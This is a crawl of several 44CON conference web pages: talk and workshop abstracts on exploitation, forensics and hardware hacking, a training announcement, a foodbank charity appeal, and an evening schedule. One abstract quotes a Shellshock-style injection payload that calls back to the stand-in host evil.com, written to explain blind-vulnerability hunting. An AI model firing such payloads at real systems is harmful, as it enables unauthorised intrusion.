          This presentation will not only discuss the features at a high level, but will also dive deeper into some of the more technical details around the new and more interesting features, including stageless payloads, transport modification, paranoid mode, and persistence. It will also cover some of the common pitfalls that cause shells to fail, and how to avoid them.

          It may even cover a sneak peak of what’s to come further down the track!


          Windows 10: 2 Steps Forward, 1 Step Back

          Presented By: James Forshaw

          Windows 10 is shaping up to be one of the most secure consumer operating systems yet, it includes many new security features baked in such as Control Flow Guard and Credentials Isolation. But new features have a habit of coming with additional bugs which only serve to reduce the security of the system at the same time.

          This presentation will describe a few of the new security features introduced into Windows 10 as well as some of the vulnerabilities I’ve discovered which demonstrate that secure engineering is still very difficult in practice.


          Exploiting 64-bit IE on Windows 8.1 – The Pwn2Own Case Study

          Presented By: Yuki Chen and Linan Hao

          Instead of 32-bit IE, this year’s Pwn2Own competition selected 64-bit Internet Explorer as the target for the first time. 64-bit IE brings new challenges to exploit writers, for example, simple heap spraying technique will not work in 64-bit process. And in order to win the game, we also need to bypass the control flow guard (CFG) mitigation on windows 8.1 as well as the enhanced protected mode (EPM) sandbox of IE.

          In this presentation, we will disclose the details of the 2 vulnerabilities we used to take down 64-bit IE in Pwn2Own 2015 for the first time. We will go through the poc exploit to demonstrate the techniques we used to work out a working IE 64-bit exploit. We will show how we achieved ASLR & CFG bypass and remote code execution in 64-bit IE with a single uninitialized memory bug. We will also discuss the bug we used to bypass IE’s EPM sandbox to achieve elevation of privilege.


          Barbarians At The Gate(way): An Examination Of The Attacker’s Tool Box

          Presented By: Dave Lewis

          This talk will examine the tools, methods and data behind the DDoS attacks that are prevalent in the news headlines. Using information collected, the presentation will demonstrate what the attackers are using to cause their mischief & mayhem, and examine the timeline and progression of attackers as they move from the historical page defacers to the motivated DDoS attacker.

          We will look at the motivations and rationale that they have and try to share some sort of understanding as to what patterns to be aware of for their own protection.


          Smart Muttering; a story and toolset for smart meter platform

          Presented By: Ian de Villiers

          The use of smart meters and their associated technologies is becoming more widespread as utility providers struggle to deal with ever growing demand and scarcer resources. The European Union has deployed over 46 million smart meters to date, with an additional 119 million smart meters intended to be deployed in member countries by 2019. Likewise, in the United States of America, there are indications that the number of smart meters deployed had topped the 50 million mark in middle July, 2014.

          Previous work has shown security and privacy concerns with smart metering specifically, with researchers at IOActive even developing a “Smart Grid Worm”. However, this work has done little to open either smart meter research to a wider audience, or provide tools for approaching new platforms and devices.

          To address this, we developed a pluggable framework and easy-to-build low-cost hardware platform for embedded device protocol analysis and manipulation. Both of which will be released under an open-source license during the talk.

          Whilst smart devices have been developed for managing resources, their functionality has also been found to be applicable to other spheres, resulting in technologies (based on, or similar to smart technologies) often being found in other applications. Some smart device platforms are also used in process management applications, and even transport management systems. The resources governed by these systems are regarded as critical infrastructure by most governments. Disruption of these systems could result in significant damage to national infrastructure – or even political instability in a region targeted by attackers. In addition to smart networks, the advent of the so-called “Internet of Things”, has added a plethora of new devices to home networks. Thus these technologies are responsible for securing access to both nation-state as well as residential resources, making research in this area an important concern.

          Given the present and growing criticality of these devices, we embarked on a lengthy assessment of the popular LonMark platform as implemented in the Echelon Series 5000-based devices with the aim of discovering platform-wide vulnerabilities that could be used to attack devices or their backend management platforms.

          However, no to very little tools exist for assessing devices making use of obscure networks or protocols. Currently, attacking smart meters, interconnected hardware and associated applications – is not as simple as firing up a web proxy and intercepting traffic, as is the case with web applications, something this talk hopes to change. In most cases, the devices communicate over mediums researchers may not be familiar with and may use custom protocols, resulting in difficulties obtaining access to network communication streams.

          To counter these obstacles, I will present various mechanisms for assessing the security of obscure networks, protocols and devices. This will be performed using off-the-shelf hardware and a custom framework for conducting this type of work.

          This toolset, the result of thousands of hours worth of research, will provide functionality for conducting traditional sniffing, replay and fuzzing attacks against devices making use of wired connections. Using this framework, the analyst will practically demonstrate attacks against the smart devices used during the course of this research.


          How to drive a malware analyst crazy

          Presented By: Michael Boman

          This talk will discuss the different methods malware authors use to complicate the malware forensics / reverse engineering. It will discuss both the history of anti-forensics and what is being used today.


          Playing with Fire: Attacking the FireEye MPS

          Presented By: Felix Wilhelm

          This talk will give an overview of a number of vulnerabilities in FireEye’s Malware Protection System (MPS) that were recently discovered (and which are patched in the interim). These range from command injections in the management web interface over local privilege escalation vulnerabilities to exploits that allow a full compromise of the system by simply sending a malicious file over the network and exploiting bugs in the analysis process.

          We will discuss the inherent attack exposure of certain types of network security controls, together with architectural recommendations how those could be addressed.


          Is there an EFI monster inside your apple?

          Presented By: Pedro Vilaça

          I publicly disclosed an Apple EFI firmware zero day.

          It was a very powerful bug allowing direct access to the EFI firmware from the operating system. EFI rootkits are some of the most powerful and most interesting rootkits. Because they work at a very low level they can play a lot of tricks to hide themselves from forensics and persist for a long time.

          EFI monsters are a bit like jaguars, stealthy and rarely seen by humans. This doesn’t mean they do not exist. EFI monsters are most certainly part of spy agencies rootkits catalog. Very few tools exist to chase them.

          This talk is about introducing you to the EFI world so you can also start to chase these monsters. EFI world might look scary but it’s a bit easier than you think and a lot of fun.


          DDoS mitigation EPIC FAIL collection

          Presented By: Moshe Zioni

          I have been researching DDoS attacks and mitigation techniques for the past three years and worked with industry leaders on testing their systems, providing them with cutting edge, and even never-seen-before attacks.

          I was amazed (actually still am) to find out that those big corporations, investing much work into their architecture of defense came to FAIL and sometimes the sole reason for a successful attack was a mitigation configuration or architecture FAIL. My research is done by utilizing smart grids of computers, mimicking vast botnets from all over the world, writing and perfecting scripted attacks and even involve social engineering attempts within those attacks (for mitigation that involve manual intervention). In the presentation there will be a showcase of 10 such FAILs, detailed technically as for a step-by-step close follow on the attack strategy and its mitigation failing, and of course – how delving into a recommended setup for a proper mitigation technique that will not inflict such a direct damage as presented.


          Jtagsploitation: 5 wires, 5 ways to root

          Presented By: Joe FitzPatrick & Matt King

          JTAG comes up in nearly every hardware-related hack. In order to do anything via JTAG, you generally need a hardware debugging device that connects to anything from a standard header to undocumented test points scattered around a device. JTAG access is almost always ‘game over’ but it’s not always clear how to turn that hardware access into privileged software access on the system.

          This talk will enumerate a number of different ways to turn a ‘check’ for jtag access into the ‘checkmate’ of root shell access. Each example will demonstrate a unique method for getting root access via JTAG. Each method is also general enough to be broadly applicable across different hardware architectures and implementations. Example code and scripts will be released at the talk.


          Hunting Asynchronous Vulnerabilities

          Presented By: James Kettle

          In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions can easily survive repeated pentests and arrive in production unfixed.

          The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen.

          In this presentation, I’ll show that exploit-induced callbacks can be taken far beyond () { :;}; echo 1 > /dev/udp/evil.com/53 to find blind and asynchronous XXE, (DOM)XSS, SQli, SMTP and even pure XML injection. I’ll examine a range of techniques to coax applications into issuing a callback by any means possible. These will start out clean and simple and quickly degenerate into crude cross-technology/platform multi-context exploit chains, some of which are definitely not advisable for production servers.

          This presentation will also cover coping strategies for some of the innate hazards associated with hosting the infrastructure required to automate finding these vulnerabilities.


          Old Dog, New Tricks: Forensics With PowerShell

          Presented By: Jared Atkinson

          Recent intrusion into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats.

          In this workshop, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.


          Inside Terracotta VPN

          Presented By: Kent Backman

          Virtual Private Networks (VPN) are very popular. They are part and parcel for almost every enterprise network, especially those with remote employees. Aside from VPNs for enterprises, there are many reputable commercial VPN services that offer low cost, reliable service to individual users. These users employ VPNs for reasons that might include connection security, protection of privacy data, online gaming acceleration, and bypassing service provider restrictions. VPN’s are also popular with cyber criminals, as it is one way the latter can obscure their true source location. When a commercial VPN service provider uses resources such as servers and copious bandwidth stolen or repurposed from unsuspecting victims for purposes of profit, the offering clearly crosses into the criminal domain. In this report, FirstWatch exposes one such operator doing business with multiple VPN brand names out of the People’s Republic of China (PRC). At last count, the Terracotta VPN node ecosystem consisted of more than 1500 systems around the globe. Every Windows server running as a Terracotta VPN node that FirstWatch was able to verify was hacked.

          The operators behind Terracotta VPN continue their broad campaign to compromise multiple victim organizations around the world. Meanwhile, advanced threat actors such as Shell_Crew (Google RSA Shell_Crew for details) use Terracotta VPN to anonymize their activity while they hack the crap out of governments and commercial entities around the world. While RSA has yet to release the paper to the public, an earlier version of Inside Terracotta VPN was presented to Microsoft’s invitation-only Digital Crimes Consortium (DCC 2105) conference in Miami. This presenter will share with the 44CON London audience otherwise non-public information previously restricted to law enforcement on how this was discovered, and other stuff not appearing in the paper to be released by RSA (this summer).


          Hackers in the Wire and Drones Oh My!

          Presented By: Philip Polstra

          At the second 44CON Phil debuted The Deck, a penetration testing Linux distro for the BeagleBoard, BeagleBone, BeagleBone Black, and similar small computing devices. In this talk you will learn how to perform very powerful, yet inexpensive, penetration tests with an army of low-power ARM-based devices connected via a wireless, out-of-band, network. These devices range from wired/wireless dropboxes, to wired/wireless remote hacking drones, to flying remote hacking drones, to taps installed inline in the target’s data center. All of the action can be controlled from up to a mile away (Phil recommends poolside at a nearby hotel) or from anywhere in the world using gateways.

          Devices to be discussed include the BeagleBone Black, BeagleBoard xM, BeagleBoard X15, the Little Universal Network Appliance (LUNA), the Raspberry Pi 2, and aerial delivery platforms.


          Attacking VxWorks: from Stone Age to Interstellar

          Presented By: Yannick Formaggio

          VxWorks is the world’s most widely-used real-time operating system deployed in embedded systems. Its market reach spans across all safety critical fields, including the Mars Curiosity rover, Boeing 787 Dreamliner, network routers to name a few. The safety critical nature of these applications make VxWorks security a major concern.

          Our team has conducted a thorough security analysis on VxWorks, including its supported network protocols and OS security mechanism. We will present the tool we developed for VxWorks assessment. The main goal of our tool is to provide effective penetration testing by implementing the WdbRPC protocol in python. To show its effectiveness, we are going to reveal some of the bugs we discovered along the way.

          Finally, we will wrap up by demonstrating the vulnerability we found that allows remote code execution on most VxWorks based devices. A quick Internet scan shows that at least 100k devices running VxWorks are connected to the Internet. Considering the popularity of VxWorks in the age of IoT, this issue will have a widespread impact.


          reverse reverse engineering

          Presented By: Richo Healey

          Richo will walk attendees through the basic architecture of a traditional AOT compiler and runtime loader, and describe the parallels between this and the operation of a modern bytecode VM (python, ruby, etc). With this newfound knowledge, we’ll tackle implementing a tool to reverse engineer a sample of obfuscated ruby. However, instead of analyzing the bytecode directly, we will instead implement a malicious, but otherwise fully functional VM, and use that to explore the various anti-analysis tricks deployed.

          By the end of the talk, you will have extended insight into the conceptual inner workings of a compiler, and feel equipped to implement substitutes for the interesting parts of a traditional compilation/loader pipeline to trick opaque objects into telling you how they work, instead of the other way around. While the demos will focus on ruby, the techniques demonstrated are equally applicable to python, etc.


          MITMf: Bringing Man-In-The-Middle attacks to the 21’st century

          Presented By: Marcello Salvati

          Tired of managing countless scripts for automating your Man-In-The-Middle attacks?

          Have a cool idea for a MITM attack, but don’t want to spend hours writing a script from scratch?

          Tired of bashing your head against the wall trying to figure out why Ettercap’s filters are not working?

          Well look no further!

          MITMf combines new and old MITM techniques into a framework! Written in Python, It’s built to be extremely extendible and reliable , while updating the current MITM attacks for the 21st century!


          Dark Fairytales from a Phisherman (Vol.II)

          Presented By: Michele Orru

          Phishing attacks are a prevalent threat against large or small organisations. As professionals in the security field we need to be able to give our clients the look and feel of what a real “bad guy” may do to attack an organisation.

          Leverage Phishing Frenzy and BeEF on your next engagement to ensure your client is getting the most out of their assessment. With simple templates you can launch an effective phishing campaign in minutes, and thanks to the BeEF integration you’ll be hooking and exploiting browsers in no time.

          Have you ever wondered what is the best pretext to use during your phishing campaign use-case? What about timeframes? We’ll discuss statistics based on real-world professional phishing engagements. We’ll also entertain you with fun (and real) hacking stories involving phishing and client-side exploitation.


          Reverse engineering and exploiting font rasterizers: the OpenType saga

          Presented By: Mateusz Jurczyk

          Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild.

          Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs.

          The presentation will outline the current state of the art with regards to font security research, in the context of how the overall field of typography has evolved over the years, both back in the 80’s and 90’s and the more recent times, including the connections and ties between various font engines seen today. Following the enumeration of potential attack surfaces, we will discuss the process of reverse-engineering widespread proprietary OpenType/CFF implementations such as the Windows kernel ATMFD.DLL module (Adobe Type Manager Font Driver), and provide an in-depth analysis of the root cause and reliable exploitation process of vulnerabilities discovered in products such as Microsoft Windows, Adobe Reader, DirectWrite (Internet Explorer), FreeType and others.


          15-Minute Linux Incident Response Live Analysis

          Presented By: Philip Polstra

          This presentation will show attendees how to perform an initial live analysis of a Linux system in mere minutes. The focus of the talk will be a set of shell scripts that allow an investigator to quickly make a determination as to whether or not an incident has occurred without the need to shutdown the system to perform traditional dead analysis.

          Within 15 minutes the investigator should have a rough idea of what has transpired and will be in a better position to determine if dead analysis is warranted. The shell scripts presented minimize the disturbance to the system and send all information to a forensics workstation over the network.

          Nothing beyond basic Linux knowledge (user not administrator) is required of attendees. Attendees will leave with some tools for live analysis and also a good introduction to shell scripting for those that are new to this topic.


          A Trek to the Emerald City: Ring -1 Based AV

          Presented By: Shift

          To compete in the endless race against rootkits, antivirus software vendors are slowly starting to use the Virtualization Extensions offered by commodity CPUs.

          The attack surface of AV software has been has been large enough until now, but hypervisor-based AV solutions expose a whole new attack surface. By exploiting flaws in AV software, instead of Ring 0 control or full Administrator privileges, it is now possible to gain Ring -1 permissions, an almost jackpot-like Ring which allows controlling the Virtualization Extensions our CPUs employ.

          This talk takes us into the realm of Hypervisor based AVs, to see how well they’ve managed to walk in the depths or Ring -1 in their attempts to implement a thin hypervisor layer to help in the fight against rootkits. track: Offence


          Get in the Ring0 – Understanding Windows drivers

          Presented By: Graham Sutherland

          Separate your IRPs from your IRQLs, people, it’s time to learn about Windows drivers. Turns out they’re not magic. Who knew?


          Going AUTH the Rails on a Crazy Train

          Presented By: Tomek Rabczak & Jeff Jarmoc

          Rails has a strong foundation in convention over configuration. In this regard, Rails handles a lot of security related conventions for developers, keeping them safe from vulnerabilities such as SQL Injection, XSS, and CSRF out of the box. However, authentication and authorization logic is largely left up to the developer. It is here that the abilities of the framework hit the end of the track and it’s up to the developers to keep themselves safe. In this talk, we take a look at patterns that we’ve seen across some of the largest Rails applications on the internet and cover common pitfalls that you as a security researcher and/or developer can watch out for. We will also be discussing and releasing a new dynamic analysis tool for Rails applications to help pentesters navigate through authentication and authorization solutions in Rails.


          Responsible disclosure: who cares?

          Presented By: OJ Reeves & Dan Tentler

          Both OJ and Dan have been conducting security assessments for years. Occasionally a discovery is made which warrants discreetly contacting the vendor in question to let them know several thousand (or million) of their devices have a major vulnerability. Sometimes the vendor takes notice and subsequently takes action, however sadly on most occasions they either feign effort, completely ignore the researcher, or openly say ‘go away’. These are a couple stories of how responsible disclosure was attempted, but the company in question couldn’t be troubled to help themselves.

          Dan will articulate the story of events surrounding the recent goatse-ing of a sign in Atlanta, Georgia. LED billboards are apparently just like every other “IoT” style device – completely open, completely public, you just have to know where to look. A little shodanning and one can find any number of colorful things on the internet. Dan will tell the story about his attempts to notify this sign company shortly before they got goatse’d, their interactions before and after and the demeanor in which one can conduct oneseself when going about turning a security disclosure into a conference talk. We will check live on stage to see how many of these things still exist, as well.

          OJ will tell a horrible tale of his first ever disclosure experience, one that involved a very large vendor of consumer storage products. The story consists of initial vulnerability discovery, analysis, and exploitation, and then leads into what seemed like an endless back-and-forth with the vendor over a series of months. There were lows, and there were highs. The former outnumbered the latter. There was much derp! All will be shared in its lulzy glory, in gory detail, up to and including a discussion with the vendor’s CSO. The story will end with an opinion. A strong one. OJ will also be trawling shodan to show how many boxes are still vuln. He will be going through the exploit step by step and explaining how things were discovered.


          Software Defined Networking (SDN) Security

          Presented By: David Jorm

          SDN is rapidly moving from R&D to production deployment, with some frightening security implications. This presentation will provide an overview of emerging SDN technologies, the attack surfaces they expose, and the kinds of vulnerabilities that have already been discovered in popular SDN controllers. A live demo of several exploits will show the potential security implications of deploying SDN in production today. Finally we will look at some efforts currently underway to improve the security of SDN controllers.


          Forging the USB armory

          Presented By: Andrea Barisani

          The availability of modern System on a Chip (SoC) parts, having low power consumption and high integration of most computer components in a single chip, empowers the open source community in creating all kind of embedded systems.

          The presentation illustrates the journey that we have taken to develop an open hardware board first of its kind: the USB armory, an open source hardware design, implementing a flash drive sized computer for security applications.

          The security features of the USB armory System on a Chip (SoC), combined with the openness of the board design, is meant to empower developers and users with a fully customizable USB trusted device for open and innovative personal security applications.

          The presentation explores the lessons learned in making a small form factor, high specifications, embedded device with solely open source tools, its architecture and security features such as secure boot and ARM TrustZone implementation.

          The security applications of the implemented concept are explored, illustrating the advantage of an open USB device with increased computational power.

          The first open source application for the platform, developed by Inverse Path, for advanced file encryption functionality, will also be covered.


          Stegosploit – Drive-by Browser Exploits using only Images

          Presented By: Saumil Shah

          “A good exploit is one that is delivered with style”.

          Stegosploit creates a new way to encode “drive-by” browser exploits and deliver them through image files. These payloads are undetectable using current means. This paper discusses two broad underlying techniques used for image based exploit delivery – Steganography and Polyglots. Drive-by browser exploits are steganographically encoded into JPG and PNG images. The resultant image file is fused with HTML and Javascript decoder code, turning it into an HTML+Image polyglot. The polyglot looks and feels like an image, but is decoded and triggered in a victim’s browser when loaded.


          #####EOF##### DSC_2144 – 44CON

          DSC_2144

          #####EOF##### 44CON LONDON 2015 Workshops – 44CON

          44CON LONDON 2015 Workshops

          Most of these workshops are now available to view on vimeo.

          Some of the following workshops have specific requirements for items that attendees should bring along, full details can be found here on the requirements page.

          Indicators of Compromise: From malware analysis to eradication

          Presented By: Michael Boman

          This workshop takes you through the steps from locating a unknown malware inside the corporate network to analyzing the sample to identify the indicators of compromise and use those to eradicate the malware from the enterprise network using freely available tools – some that you might already have deployed.

          Introduction to Reverse Engineering C++

          Presented By: Angel M. Villegas

          C++ and Object Oriented Programming (OOP) has been around for a while. Software (small to large scale projects) and malware are leveraging C++ and OOP more and more. Understanding how to program and reverse engineer C++ can aid in finding or exploiting vulnerabilities, performing in-depth analysis on malware, hacking games, etc.

          Requirements

          Hands-on JTAG for fun and root shells

          Presented By: Joe FitzPatrick

          JTAG may be almost 30 years old with little change, but that doesn’t mean most people really understand what it does and how. This workshop will start with a brief introduction to what JTAG really is, then quickly dive into some hands-on practice with finding, wiring, and finally exploiting a system via JTAG.

          For this UK-themed workshop, we’ll target a Raspberry Pi (Cambridge) with an ARM (also Cambridge) microprocessor. In order to interact with the system, we’ll use a JTAG interface cable from FTDI (Glasgow). We won’t do any hardware modifications, but we will hook up wires in weird and wonderful ways to make the Raspberry Pi do things it otherwise shouldn’t

          Analyzing Malicious Office Documents

          Presented By: Didier Stevens

          In this workshop (2 hours), I explain how to use the tools (oledump, emldump, YARA rules, …) I developed to analyze (malicious) Microsoft Office documents.

          I have around 20 exercises that explain step by step to the workshop participants how they can analyze malicious office documents with my Python tools. Microsoft Office is not required for the analysis.

          Old Dog, New Tricks: Forensics With PowerShell

          Presented By: Jared Atkinson

          Recent intrusion into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats.

          In this workshop, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.

          Pen Test Partners IoT Workshop

          Presented By: Dave Lodge

          We are constantly expanding and sharing our understanding of the Internet of Things and generally discovering that it is really quite broken. It’s easy to put remote controlled chipsets into everyday appliances and gadgets and manage their data in the cloud, but where are the safeguards and security frameworks? We have researched many app enabled “things” from kids toys to sex toys and kettles and every single one was found wanting. While the findings are fun, the implications are not. We’ll show you how they can create serious security headaches, from giving up Wi-Fi PSKs to being used as network implants.

          The workshop will start with a brief slot covering our research to date with Fitbit’s Aria scales; what we’ve found, what we’ve learned, where we’ve got stuck, and what we’ve guessed at. We will discuss a few vulnerabilities that we have discovered and help get you started on finding some more. Once we’ve set the scene the workshop can begin. This is really a 101 on logic probing and hardware analysis, so we’ll share some basic techniques for logic probing; UART, SPI, Flash etc.

          #####EOF##### 44CON Training Goes Quarterly – 44CON

          44CON Training Goes Quarterly

          We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused course on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

          That’s right, you no longer have to wait a year to sit a high quality training course!

          Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

          Mastering Container Security – Rory McCune, NCC Group
          Malware Reverse Engineering – Joxean Koret

          Both courses are two-days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

          If you’d like to offer a high-end course in London, get in touch.

          #####EOF##### charity – 44CON

          Making Britain a Better Place For The Most Vulnerable

          “You measure the degree of civilization of a society by how it treats its weakest members.”

          This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

          The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

          Help us raise money at 44CON

          We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

          Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

          We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

          All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

          Get involved

          We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

          #####EOF##### Network Forensics: A blog post by Erik Hjelmvik – 44CON

          Network Forensics: A blog post by Erik Hjelmvik

          I have learned a lot about how to track malware and attackers in network traffic while developing and improving the network forensics tool NetworkMiner throughout the past  10 years. The primary purpose of NetworkMiner has always been to help incident responders and forensic investigators to do their job more efficiently. Even though NetworkMiner is my favourite tool for analysing PCAP files I’m still a regular user of other tools such as  Wireshark, tshark, tcpdump, Argus, ngrep, tcpflow and of course CapLoader. However, incident response and forensic work is much more than just knowing what tools to use. It is more about knowing what data to analyze and why.

          I will teach several of my favourite techniques for analysing intrusions, tracking criminals and doing threat hunting at the Network Forensics Training at 44CON. The participants will learn how to investigate intrusions and find forensic artefacts in a dataset of several gigabytes of captured network traffic. The training primarily focuses on practical analysis techniques for finding and tracing malicious actors, which involves a great deal of hands-on practice with finding evil in PCAP data.

          The first day of training focuses on analysis using only open source tools. The second day primarily covers training on the commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools. This training is not only a unique opportunity to learn how to use NetworkMiner and CapLoader directly from the guy who develops them, it is also a great excuse to spend two full days playing around with PCAP files.

          You can find more details about the training here.

          #####EOF##### Teile einen Link auf Twitter

          Teile einen Link mit deinen Followern

          Neu bei Twitter?

          Erhalte Updates von deinen Freunden, von Prominenten und Unternehmen, und erfahre, was es Neues in der Welt gibt.

          Was ist Twitter? Mehr erfahren.

          #####EOF##### What To Expect On Thursday Night – 44CON

          What To Expect On Thursday Night

          44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

          If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

          HackerOne_black_1

          First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complementary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of Alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

          The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

          Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

          Looking for something more blue team than red? From 20:00, Phillipe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

          While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

          • Best billed idea
          • Most lame duck pitch
          • Most quackers concept

          Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

          If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

          Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature either in part or in hole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### Teile einen Link auf Twitter

          Teile einen Link mit deinen Followern

          Neu bei Twitter?

          Erhalte Updates von deinen Freunden, von Prominenten und Unternehmen, und erfahre, was es Neues in der Welt gibt.

          Was ist Twitter? Mehr erfahren.

          #####EOF##### 44CONnect March Week – What to expect – 44CON

          44CONnect March Week – What to expect

          We have a fantastic week planned from March 11th-14th with training, a day of talks and of course hanging out with our friends at CRESTCon. If you want to take part there’s still time, just book a seat on Rory’s course, or contact us from your early bird ticket e-mail address.

          Monday 11th March – Training

          Training opens at the Novotel London West for registration at 08:15 GMT with a 09:00 Start. Coffee and breakfast snacks will be available from 08:30. There are opportunities to break throughout the day and of course lunch is provided.

